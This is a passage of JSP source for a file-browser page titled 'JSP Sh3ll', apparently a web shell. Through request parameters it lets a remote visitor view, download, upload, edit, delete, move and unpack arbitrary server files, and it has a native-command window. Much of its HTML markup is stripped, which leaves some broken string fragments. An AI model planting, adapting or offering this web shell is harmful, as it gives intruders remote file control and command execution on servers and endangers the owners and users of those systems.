Process has timed out, destroyed !!!!!"); 622 | } 623 | try { 624 | Thread.sleep(50); 625 | } 626 | catch (InterruptedException ie) {} 627 | } 628 | } 629 | catch (IOException e) { 630 | ret.append("Error: " + e); 631 | } 632 | return ret.toString(); 633 | } 634 | 635 | /** 636 | * Converts a dir string to a linked dir string 637 | * @param dir the directory string (e.g. /usr/local/httpd) 638 | * @param browserLink web-path to Browser.jsp 639 | */ 640 | static String dir2linkdir(String dir, String browserLink, int sortMode) { 641 | File f = new File(dir); 642 | StringBuffer buf = new StringBuffer(); 643 | while (f.getParentFile() != null) { 644 | if (f.canRead()) { 645 | String encPath = URLEncoder.encode(f.getAbsolutePath()); 646 | buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); 648 | } 649 | else buf.insert(0, conv2Html(f.getName()) + File.separator); 650 | f = f.getParentFile(); 651 | } 652 | if (f.canRead()) { 653 | String encPath = URLEncoder.encode(f.getAbsolutePath()); 654 | buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); 656 | } 657 | else buf.insert(0, f.getAbsolutePath()); 658 | return buf.toString(); 659 | } 660 | 661 | /** 662 | * Returns true if the given filename tends towards a packed file 663 | */ 664 | static boolean isPacked(String name, boolean gz) { 665 | return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") 666 | || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() 667 | .endsWith(".war")); 668 | } 669 | 670 | /** 671 | * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not 672 | */ 673 | static boolean isAllowed(File path) throws IOException{ 674 | if (RESTRICT_BROWSING) { 675 | StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); 676 | while (stk.hasMoreTokens()){ 677 | if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) 678 | return RESTRICT_WHITELIST; 679 | } 680 | return !RESTRICT_WHITELIST; 681 | } 682 | else 
return true; 683 | } 684 | 685 | //--------------------------------------------------------------------------------------------------------------- 686 | 687 | %> 688 | <% 689 | //Get the current browsing directory 690 | request.setAttribute("dir", request.getParameter("dir")); 691 | // The browser_name variable is used to keep track of the URI 692 | // of the jsp file itself. It is used in all link-backs. 693 | final String browser_name = request.getRequestURI(); 694 | final String FOL_IMG = ""; 695 | boolean nohtml = false; 696 | boolean dir_view = true; 697 | // View file 698 | if (request.getParameter("file") != null) { 699 | File f = new File(request.getParameter("file")); 700 | if (!isAllowed(f)) { 701 | request.setAttribute("dir", f.getParent()); 702 | request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); 703 | } 704 | else if (f.exists() && f.canRead()) { 705 | if (isPacked(f.getName(), false)) { 706 | //If zipFile, do nothing here 707 | } 708 | else{ 709 | String mimeType = getMimeType(f.getName()); 710 | response.setContentType(mimeType); 711 | if (mimeType.equals("text/plain")) response.setHeader( 712 | "Content-Disposition", "inline;filename=\"temp.txt\""); 713 | else response.setHeader("Content-Disposition", "inline;filename=\"" 714 | + f.getName() + "\""); 715 | BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); 716 | byte buffer[] = new byte[8 * 1024]; 717 | out.clearBuffer(); 718 | OutputStream out_s = new Writer2Stream(out); 719 | copyStreamsWithoutClose(fileInput, out_s, buffer); 720 | fileInput.close(); 721 | out_s.flush(); 722 | nohtml = true; 723 | dir_view = false; 724 | } 725 | } 726 | else { 727 | request.setAttribute("dir", f.getParent()); 728 | request.setAttribute("error", "File " + f.getAbsolutePath() 729 | + " does not exist or is not readable on the server"); 730 | } 731 | } 732 | // Download selected files as zip file 733 | else if ((request.getParameter("Submit") != null) 
734 | && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { 735 | Vector v = expandFileList(request.getParameterValues("selfile"), false); 736 | //Check if all files in vector are allowed 737 | String notAllowedFile = null; 738 | for (int i = 0;i < v.size(); i++){ 739 | File f = (File) v.get(i); 740 | if (!isAllowed(f)){ 741 | notAllowedFile = f.getAbsolutePath(); 742 | break; 743 | } 744 | } 745 | if (notAllowedFile != null){ 746 | request.setAttribute("error", "You are not allowed to access " + notAllowedFile); 747 | } 748 | else if (v.size() == 0) { 749 | request.setAttribute("error", "No files selected"); 750 | } 751 | else { 752 | File dir_file = new File("" + request.getAttribute("dir")); 753 | int dir_l = dir_file.getAbsolutePath().length(); 754 | response.setContentType("application/zip"); 755 | response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); 756 | out.clearBuffer(); 757 | ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); 758 | zipout.setComment("Created by jsp File Browser v. 
" + VERSION_NR); 759 | zipout.setLevel(COMPRESSION_LEVEL); 760 | for (int i = 0; i < v.size(); i++) { 761 | File f = (File) v.get(i); 762 | if (f.canRead()) { 763 | zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); 764 | BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); 765 | byte buffer[] = new byte[0xffff]; 766 | copyStreamsWithoutClose(fr, zipout, buffer); 767 | /* int b; 768 | while ((b=fr.read())!=-1) zipout.write(b);*/ 769 | fr.close(); 770 | zipout.closeEntry(); 771 | } 772 | } 773 | zipout.finish(); 774 | out.flush(); 775 | nohtml = true; 776 | dir_view = false; 777 | } 778 | } 779 | // Download file 780 | else if (request.getParameter("downfile") != null) { 781 | String filePath = request.getParameter("downfile"); 782 | File f = new File(filePath); 783 | if (!isAllowed(f)){ 784 | request.setAttribute("dir", f.getParent()); 785 | request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); 786 | } 787 | else if (f.exists() && f.canRead()) { 788 | response.setContentType("application/octet-stream"); 789 | response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() 790 | + "\""); 791 | response.setContentLength((int) f.length()); 792 | BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); 793 | byte buffer[] = new byte[8 * 1024]; 794 | out.clearBuffer(); 795 | OutputStream out_s = new Writer2Stream(out); 796 | copyStreamsWithoutClose(fileInput, out_s, buffer); 797 | fileInput.close(); 798 | out_s.flush(); 799 | nohtml = true; 800 | dir_view = false; 801 | } 802 | else { 803 | request.setAttribute("dir", f.getParent()); 804 | request.setAttribute("error", "File " + f.getAbsolutePath() 805 | + " does not exist or is not readable on the server"); 806 | } 807 | } 808 | if (nohtml) return; 809 | //else 810 | // If no parameter is submitted, it will take the path from jsp file browser 811 | if (request.getAttribute("dir") == null) { 812 | 
String path = null; 813 | if (application.getRealPath(request.getRequestURI()) != null) path = new File( 814 | application.getRealPath(request.getRequestURI())).getParent(); 815 | 816 | if (path == null) { // handle the case where we are not in a directory (ex: war file) 817 | path = new File(".").getAbsolutePath(); 818 | } 819 | //Check path 820 | if (!isAllowed(new File(path))){ 821 | if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; 822 | else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); 823 | } 824 | request.setAttribute("dir", path); 825 | }%> 826 | 828 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 836 | <% 837 | //If a cssfile exists, it will take it 838 | String cssPath = null; 839 | if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( 840 | application.getRealPath(request.getRequestURI())).getParent() 841 | + File.separator + CSS_NAME; 842 | if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); 843 | if (new File(cssPath).exists()) { 844 | %> 845 | 846 | <%} 847 | else if (request.getParameter("uplMonitor") == null) {%> 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | --==[[JSP Sh3ll]]==-- 857 | 858 | 859 | 860 | 861 | 1022 | <%} 1023 | 1024 | //Check path 1025 | if (!isAllowed(new File((String)request.getAttribute("dir")))){ 1026 | request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); 1027 | } 1028 | //Upload monitor 1029 | else if (request.getParameter("uplMonitor") != null) {%> 1030 | <% 1033 | String fname = request.getParameter("uplMonitor"); 1034 | //First opening 1035 | boolean first = false; 1036 | if (request.getParameter("first") != null) first = true; 1037 | UplInfo info = new UplInfo(); 1038 | if (!first) { 1039 | info = UploadMonitor.getInfo(fname); 1040 | if (info == null) { 1041 | //Windows 1042 | int posi = fname.lastIndexOf("\\"); 1043 | if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); 1044 | } 1045 
| if (info == null) { 1046 | //Unix 1047 | int posi = fname.lastIndexOf("/"); 1048 | if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); 1049 | } 1050 | } 1051 | dir_view = false; 1052 | request.setAttribute("dir", null); 1053 | if (info.aborted) { 1054 | UploadMonitor.remove(fname); 1055 | %> 1056 | 1057 | 1058 | 1059 | Upload of <%=fname%>
1060 | Upload aborted. 1061 | <% 1062 | } 1063 | else if (info.totalSize != info.currSize || info.currSize == 0) { 1064 | %> 1065 | 1066 | 1067 | 1068 | Upload of <%=fname%>
1073 | <%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> 1074 | (<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
1075 | Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> 1076 | 1077 | <% 1078 | } 1079 | else { 1080 | UploadMonitor.remove(fname); 1081 | %> 1082 | 1083 | 1084 | Upload of <%=fname%>
1085 | Upload finished. 1086 | 1087 | <% 1088 | } 1089 | } 1090 | //Comandwindow 1091 | else if (request.getParameter("command") != null) { 1092 | if (!NATIVE_COMMANDS){ 1093 | request.setAttribute("error", "Execution of native commands is not allowed!"); 1094 | } 1095 | else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { 1096 | %> 1097 | Launch commands in <%=request.getAttribute("dir")%> 1098 | 1099 | 1100 | <% 1101 | out.println("
1121 | 1122 | 1123 | <% 1124 | dir_view = false; 1125 | request.setAttribute("dir", null); 1126 | } 1127 | } 1128 | 1129 | //Click on a filename, special viewer (zip+jar file) 1130 | else if (request.getParameter("file") != null) { 1131 | File f = new File(request.getParameter("file")); 1132 | if (!isAllowed(f)){ 1133 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1134 | } 1135 | else if (isPacked(f.getName(), false)) { 1136 | //ZipFile 1137 | try { 1138 | ZipFile zf = new ZipFile(f); 1139 | Enumeration entries = zf.entries(); 1140 | %> 1141 | <%= f.getAbsolutePath()%> 1142 | 1143 | 1144 |
Content of <%=conv2Html(f.getName())%>
1145 | 1146 | 1147 | <% 1148 | long size = 0; 1149 | int fileCount = 0; 1150 | while (entries.hasMoreElements()) { 1151 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1152 | if (!entry.isDirectory()) { 1153 | fileCount++; 1154 | size += entry.getSize(); 1155 | long ratio = 0; 1156 | if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) 1157 | / entry.getSize(); 1158 | out.println(""); 1163 | 1164 | } 1165 | } 1166 | zf.close(); 1167 | //No directory view 1168 | dir_view = false; 1169 | request.setAttribute("dir", null); 1170 | %> 1171 |
" + conv2Html(entry.getName()) 1159 | + "" + convertFileSize(entry.getSize()) + "" 1160 | + convertFileSize(entry.getCompressedSize()) + "" 1161 | + ratio + "%" + "" 1162 | + dateFormat.format(new Date(entry.getTime())) + "
1173 | <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% 1174 |
1175 | 1176 | <% 1177 | } 1178 | catch (ZipException ex) { 1179 | request.setAttribute("error", "Cannot read " + f.getName() 1180 | + ", no valid zip file"); 1181 | } 1182 | catch (IOException ex) { 1183 | request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " 1184 | + ex); 1185 | } 1186 | } 1187 | } 1188 | // Upload 1189 | else if ((request.getContentType() != null) 1190 | && (request.getContentType().toLowerCase().startsWith("multipart"))) { 1191 | response.setContentType("text/html"); 1192 | HttpMultiPartParser parser = new HttpMultiPartParser(); 1193 | boolean error = false; 1194 | try { 1195 | int bstart = request.getContentType().lastIndexOf("oundary="); 1196 | String bound = request.getContentType().substring(bstart + 8); 1197 | int clength = request.getContentLength(); 1198 | Hashtable ht = parser 1199 | .processData(request.getInputStream(), bound, tempdir, clength); 1200 | if (!isAllowed(new File((String)ht.get("dir")))){ 1201 | request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); 1202 | error = true; 1203 | } 1204 | else if (ht.get("myFile") != null) { 1205 | FileInfo fi = (FileInfo) ht.get("myFile"); 1206 | File f = fi.file; 1207 | UplInfo info = UploadMonitor.getInfo(fi.clientFileName); 1208 | if (info != null && info.aborted) { 1209 | f.delete(); 1210 | request.setAttribute("error", "Upload aborted"); 1211 | } 1212 | else { 1213 | // Move file from temp to the right dir 1214 | String path = (String) ht.get("dir"); 1215 | if (!path.endsWith(File.separator)) path = path + File.separator; 1216 | if (!f.renameTo(new File(path + f.getName()))) { 1217 | request.setAttribute("error", "Cannot upload file."); 1218 | error = true; 1219 | f.delete(); 1220 | } 1221 | } 1222 | } 1223 | else { 1224 | request.setAttribute("error", "No file selected for upload"); 1225 | error = true; 1226 | } 1227 | request.setAttribute("dir", (String) ht.get("dir")); 1228 | } 1229 | catch (Exception e) { 1230 | 
request.setAttribute("error", "Error " + e + ". Upload aborted"); 1231 | error = true; 1232 | } 1233 | if (!error) request.setAttribute("message", "File upload correctly finished."); 1234 | } 1235 | // The form to edit a text file 1236 | else if (request.getParameter("editfile") != null) { 1237 | File ef = new File(request.getParameter("editfile")); 1238 | if (!isAllowed(ef)){ 1239 | request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); 1240 | } 1241 | else{ 1242 | %> 1243 | Edit <%=conv2Html(request.getParameter("editfile"))%> 1244 | 1245 | 1246 | <% 1247 | BufferedReader reader = new BufferedReader(new FileReader(ef)); 1248 | String disable = ""; 1249 | if (!ef.canWrite()) disable = " readonly"; 1250 | out.println("
1283 | 1284 | 1285 | <% 1286 | } 1287 | } 1288 | // Save or cancel the edited file 1289 | else if (request.getParameter("nfile") != null) { 1290 | File f = new File(request.getParameter("nfile")); 1291 | File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); 1292 | if (!isAllowed(new_f)){ 1293 | request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); 1294 | } 1295 | else if (request.getParameter("Submit").equals("Save")) { 1296 | if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { 1297 | File bak = new File(new_f.getAbsolutePath() + ".bak"); 1298 | bak.delete(); 1299 | new_f.renameTo(bak); 1300 | } 1301 | if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", 1302 | "Cannot write to " + new_f.getName() + ", file is write protected."); 1303 | else { 1304 | BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); 1305 | StringReader text = new StringReader(request.getParameter("text")); 1306 | int i; 1307 | boolean cr = false; 1308 | String lineend = "\n"; 1309 | if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; 1310 | while ((i = text.read()) >= 0) { 1311 | if (i == '\r') cr = true; 1312 | else if (i == '\n') { 1313 | outs.write(lineend); 1314 | cr = false; 1315 | } 1316 | else if (cr) { 1317 | outs.write(lineend); 1318 | cr = false; 1319 | } 1320 | else { 1321 | outs.write(i); 1322 | cr = false; 1323 | } 1324 | } 1325 | outs.flush(); 1326 | outs.close(); 1327 | } 1328 | } 1329 | request.setAttribute("dir", f.getParent()); 1330 | } 1331 | //Unpack file to the current directory without overwriting 1332 | else if (request.getParameter("unpackfile") != null) { 1333 | File f = new File(request.getParameter("unpackfile")); 1334 | String root = f.getParent(); 1335 | request.setAttribute("dir", root); 1336 | if (!isAllowed(new File(root))){ 1337 | request.setAttribute("error", "You are not allowed to access " + root); 1338 | } 1339 | 
//Check if file exists 1340 | else if (!f.exists()) { 1341 | request.setAttribute("error", "Cannot unpack " + f.getName() 1342 | + ", file does not exist"); 1343 | } 1344 | //Check if directory is readonly 1345 | else if (!f.getParentFile().canWrite()) { 1346 | request.setAttribute("error", "Cannot unpack " + f.getName() 1347 | + ", directory is write protected."); 1348 | } 1349 | //GZip 1350 | else if (f.getName().toLowerCase().endsWith(".gz")) { 1351 | //New name is old Name without .gz 1352 | String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); 1353 | try { 1354 | byte buffer[] = new byte[0xffff]; 1355 | copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( 1356 | newName), buffer); 1357 | } 1358 | catch (IOException ex) { 1359 | request.setAttribute("error", "Unpacking of " + f.getName() 1360 | + " aborted. Error: " + ex); 1361 | } 1362 | } 1363 | //Else try Zip 1364 | else { 1365 | try { 1366 | ZipFile zf = new ZipFile(f); 1367 | Enumeration entries = zf.entries(); 1368 | //First check whether a file already exist 1369 | boolean error = false; 1370 | while (entries.hasMoreElements()) { 1371 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1372 | if (!entry.isDirectory() 1373 | && new File(root + File.separator + entry.getName()).exists()) { 1374 | request.setAttribute("error", "Cannot unpack " + f.getName() 1375 | + ", File " + entry.getName() + " already exists."); 1376 | error = true; 1377 | break; 1378 | } 1379 | } 1380 | if (!error) { 1381 | //Unpack File 1382 | entries = zf.entries(); 1383 | byte buffer[] = new byte[0xffff]; 1384 | while (entries.hasMoreElements()) { 1385 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1386 | File n = new File(root + File.separator + entry.getName()); 1387 | if (entry.isDirectory()) n.mkdirs(); 1388 | else { 1389 | n.getParentFile().mkdirs(); 1390 | n.createNewFile(); 1391 | copyStreams(zf.getInputStream(entry), new FileOutputStream(n), 1392 | buffer); 1393 
| } 1394 | } 1395 | zf.close(); 1396 | request.setAttribute("message", "Unpack of " + f.getName() 1397 | + " was successful."); 1398 | } 1399 | } 1400 | catch (ZipException ex) { 1401 | request.setAttribute("error", "Cannot unpack " + f.getName() 1402 | + ", no valid zip file"); 1403 | } 1404 | catch (IOException ex) { 1405 | request.setAttribute("error", "Unpacking of " + f.getName() 1406 | + " aborted. Error: " + ex); 1407 | } 1408 | } 1409 | } 1410 | // Delete Files 1411 | else if ((request.getParameter("Submit") != null) 1412 | && (request.getParameter("Submit").equals(DELETE_FILES))) { 1413 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1414 | boolean error = false; 1415 | //delete backwards 1416 | for (int i = v.size() - 1; i >= 0; i--) { 1417 | File f = (File) v.get(i); 1418 | if (!isAllowed(f)){ 1419 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1420 | error = true; 1421 | break; 1422 | } 1423 | if (!f.canWrite() || !f.delete()) { 1424 | request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() 1425 | + ". 
Deletion aborted"); 1426 | error = true; 1427 | break; 1428 | } 1429 | } 1430 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); 1431 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); 1432 | else if (!error) request.setAttribute("error", "No files selected"); 1433 | } 1434 | // Create Directory 1435 | else if ((request.getParameter("Submit") != null) 1436 | && (request.getParameter("Submit").equals(CREATE_DIR))) { 1437 | String dir = "" + request.getAttribute("dir"); 1438 | String dir_name = request.getParameter("cr_dir"); 1439 | String new_dir = getDir(dir, dir_name); 1440 | if (!isAllowed(new File(new_dir))){ 1441 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1442 | } 1443 | else if (new File(new_dir).mkdirs()) { 1444 | request.setAttribute("message", "Directory created"); 1445 | } 1446 | else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); 1447 | } 1448 | // Create a new empty file 1449 | else if ((request.getParameter("Submit") != null) 1450 | && (request.getParameter("Submit").equals(CREATE_FILE))) { 1451 | String dir = "" + request.getAttribute("dir"); 1452 | String file_name = request.getParameter("cr_dir"); 1453 | String new_file = getDir(dir, file_name); 1454 | if (!isAllowed(new File(new_file))){ 1455 | request.setAttribute("error", "You are not allowed to access " + new_file); 1456 | } 1457 | // Test, if file_name is empty 1458 | else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { 1459 | if (new File(new_file).createNewFile()) request.setAttribute("message", 1460 | "File created"); 1461 | else request.setAttribute("error", "Creation of file " + new_file + " failed"); 1462 | } 1463 | else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); 1464 | } 1465 | // Rename a file 1466 | else if ((request.getParameter("Submit") != null) 1467 | && 
(request.getParameter("Submit").equals(RENAME_FILE))) { 1468 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1469 | String dir = "" + request.getAttribute("dir"); 1470 | String new_file_name = request.getParameter("cr_dir"); 1471 | String new_file = getDir(dir, new_file_name); 1472 | if (!isAllowed(new File(new_file))){ 1473 | request.setAttribute("error", "You are not allowed to access " + new_file); 1474 | } 1475 | // The error conditions: 1476 | // 1) Zero Files selected 1477 | else if (v.size() <= 0) request.setAttribute("error", 1478 | "Select exactly one file or folder. Rename failed"); 1479 | // 2a) Multiple files selected and the first isn't a dir 1480 | // Here we assume that expandFileList builds v from top-bottom, starting with the dirs 1481 | else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( 1482 | "error", "Select exactly one file or folder. Rename failed"); 1483 | // 2b) If there are multiple files from the same directory, rename fails 1484 | else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() 1485 | && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { 1486 | request.setAttribute("error", "Select exactly one file or folder. 
Rename failed"); 1487 | } 1488 | else { 1489 | File f = (File) v.get(0); 1490 | if (!isAllowed(f)){ 1491 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1492 | } 1493 | // Test, if file_name is empty 1494 | else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { 1495 | if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { 1496 | request.setAttribute("error", "Creation of file " + new_file + " failed"); 1497 | } 1498 | else request.setAttribute("message", "Renamed file " 1499 | + ((File) v.get(0)).getName() + " to " + new_file); 1500 | } 1501 | else request.setAttribute("error", "Error: \"" + new_file_name 1502 | + "\" is not a valid filename"); 1503 | } 1504 | } 1505 | // Move selected file(s) 1506 | else if ((request.getParameter("Submit") != null) 1507 | && (request.getParameter("Submit").equals(MOVE_FILES))) { 1508 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1509 | String dir = "" + request.getAttribute("dir"); 1510 | String dir_name = request.getParameter("cr_dir"); 1511 | String new_dir = getDir(dir, dir_name); 1512 | if (!isAllowed(new File(new_dir))){ 1513 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1514 | } 1515 | else{ 1516 | boolean error = false; 1517 | // This ensures that new_dir is a directory 1518 | if (!new_dir.endsWith(File.separator)) new_dir += File.separator; 1519 | for (int i = v.size() - 1; i >= 0; i--) { 1520 | File f = (File) v.get(i); 1521 | if (!isAllowed(f)){ 1522 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1523 | error = true; 1524 | break; 1525 | } 1526 | else if (!f.canWrite() || !f.renameTo(new File(new_dir 1527 | + f.getAbsolutePath().substring(dir.length())))) { 1528 | request.setAttribute("error", "Cannot move " + f.getAbsolutePath() 1529 | + ". 
Move aborted"); 1530 | error = true; 1531 | break; 1532 | } 1533 | } 1534 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); 1535 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); 1536 | else if (!error) request.setAttribute("error", "No files selected"); 1537 | } 1538 | } 1539 | // Copy Files 1540 | else if ((request.getParameter("Submit") != null) 1541 | && (request.getParameter("Submit").equals(COPY_FILES))) { 1542 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1543 | String dir = (String) request.getAttribute("dir"); 1544 | if (!dir.endsWith(File.separator)) dir += File.separator; 1545 | String dir_name = request.getParameter("cr_dir"); 1546 | String new_dir = getDir(dir, dir_name); 1547 | if (!isAllowed(new File(new_dir))){ 1548 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1549 | } 1550 | else{ 1551 | boolean error = false; 1552 | if (!new_dir.endsWith(File.separator)) new_dir += File.separator; 1553 | try { 1554 | byte buffer[] = new byte[0xffff]; 1555 | for (int i = 0; i < v.size(); i++) { 1556 | File f_old = (File) v.get(i); 1557 | File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); 1558 | if (!isAllowed(f_old)|| !isAllowed(f_new)){ 1559 | request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); 1560 | error = true; 1561 | } 1562 | else if (f_old.isDirectory()) f_new.mkdirs(); 1563 | // Overwriting is forbidden 1564 | else if (!f_new.exists()) { 1565 | copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); 1566 | } 1567 | else { 1568 | // File exists 1569 | request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() 1570 | + ", file already exists. Copying aborted"); 1571 | error = true; 1572 | break; 1573 | } 1574 | } 1575 | } 1576 | catch (IOException e) { 1577 | request.setAttribute("error", "Error " + e + ". 
Copying aborted"); 1578 | error = true; 1579 | } 1580 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); 1581 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); 1582 | else if (!error) request.setAttribute("error", "No files selected"); 1583 | } 1584 | } 1585 | // Directory viewer 1586 | if (dir_view && request.getAttribute("dir") != null) { 1587 | File f = new File("" + request.getAttribute("dir")); 1588 | //Check, whether the dir exists 1589 | if (!f.exists() || !isAllowed(f)) { 1590 | if (!f.exists()){ 1591 | //request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); 1592 | } 1593 | else{ 1594 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1595 | } 1596 | //if attribute olddir exists, it will change to olddir 1597 | if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) { 1598 | f = new File("" + request.getAttribute("olddir")); 1599 | } 1600 | //try to go to the parent dir 1601 | else { 1602 | if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent()); 1603 | } 1604 | //If this dir also do also not exist, go back to browser.jsp root path 1605 | if (!f.exists()) { 1606 | String path = null; 1607 | if (application.getRealPath(request.getRequestURI()) != null) path = new File( 1608 | application.getRealPath(request.getRequestURI())).getParent(); 1609 | 1610 | if (path == null) // handle the case were we are not in a directory (ex: war file) 1611 | path = new File(".").getAbsolutePath(); 1612 | f = new File(path); 1613 | } 1614 | if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath()); 1615 | else request.setAttribute("dir", null); 1616 | } 1617 | %> 1618 | 1684 | <%=request.getAttribute("dir")%> 1685 | 1686 | 1687 | <% 1688 | //Output message 1689 | if (request.getAttribute("message") != null) { 1690 | out.println("
"); 1691 | out.println(request.getAttribute("message")); 1692 | out.println("
"); 1693 | } 1694 | //Output error 1695 | if (request.getAttribute("error") != null) { 1696 | out.println("
"); 1697 | out.println(request.getAttribute("error")); 1698 | out.println("
"); 1699 | } 1700 | if (request.getAttribute("dir") != null){ 1701 | %> 1702 |
1703 | 1704 | <% 1705 | // Output the table, starting with the headers. 1706 | String dir = URLEncoder.encode("" + request.getAttribute("dir")); 1707 | String cmd = browser_name + "?dir=" + dir; 1708 | int sortMode = 1; 1709 | if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request 1710 | .getParameter("sort")); 1711 | int[] sort = new int[] {1, 2, 3, 4}; 1712 | for (int i = 0; i < sort.length; i++) 1713 | if (sort[i] == sortMode) sort[i] = -sort[i]; 1714 | out.println("" 1716 | + "" 1718 | + "" 1720 | + "" 1722 | + ""); 1723 | char trenner = File.separatorChar; 1724 | // Output the Root-Dirs, without FORBIDDEN_DRIVES 1725 | File[] entry = File.listRoots(); 1726 | for (int i = 0; i < entry.length; i++) { 1727 | boolean forbidden = false; 1728 | for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { 1729 | if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; 1730 | } 1731 | if (!forbidden) { 1732 | out.println(""); 1734 | out.println(""); 1741 | } 1742 | } 1743 | // Output the parent directory link ".." 
1744 | if (f.getParent() != null) { 1745 | out.println(""); 1747 | out.println(""); 1752 | } 1753 | // Output all files and dirs and calculate the number of files and total size 1754 | entry = f.listFiles(); 1755 | if (entry == null) entry = new File[] {}; 1756 | long totalSize = 0; // The total size of the files in the current directory 1757 | long fileCount = 0; // The count of files in the current working directory 1758 | if (entry != null && entry.length > 0) { 1759 | Arrays.sort(entry, new FileComp(sortMode)); 1760 | for (int i = 0; i < entry.length; i++) { 1761 | String name = URLEncoder.encode(entry[i].getAbsolutePath()); 1762 | String type = "File"; // This String will tell the extension of the file 1763 | if (entry[i].isDirectory()) type = "DIR"; // It's a DIR 1764 | else { 1765 | String tempName = entry[i].getName().replace(' ', '_'); 1766 | if (tempName.lastIndexOf('.') != -1) type = tempName.substring( 1767 | tempName.lastIndexOf('.')).toLowerCase(); 1768 | } 1769 | String ahref = ""; 1775 | String link = buf; // The standard view link, uses Mime-type 1776 | if (entry[i].isDirectory()) { 1777 | if (entry[i].canRead() && USE_DIR_PREVIEW) { 1778 | //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip 1779 | File[] fs = entry[i].listFiles(); 1780 | if (fs == null) fs = new File[] {}; 1781 | Arrays.sort(fs, new FileComp()); 1782 | StringBuffer filenames = new StringBuffer(); 1783 | for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { 1784 | String fname = conv2Html(fs[i2].getName()); 1785 | if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); 1786 | else filenames.append(fname + ";"); 1787 | } 1788 | if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); 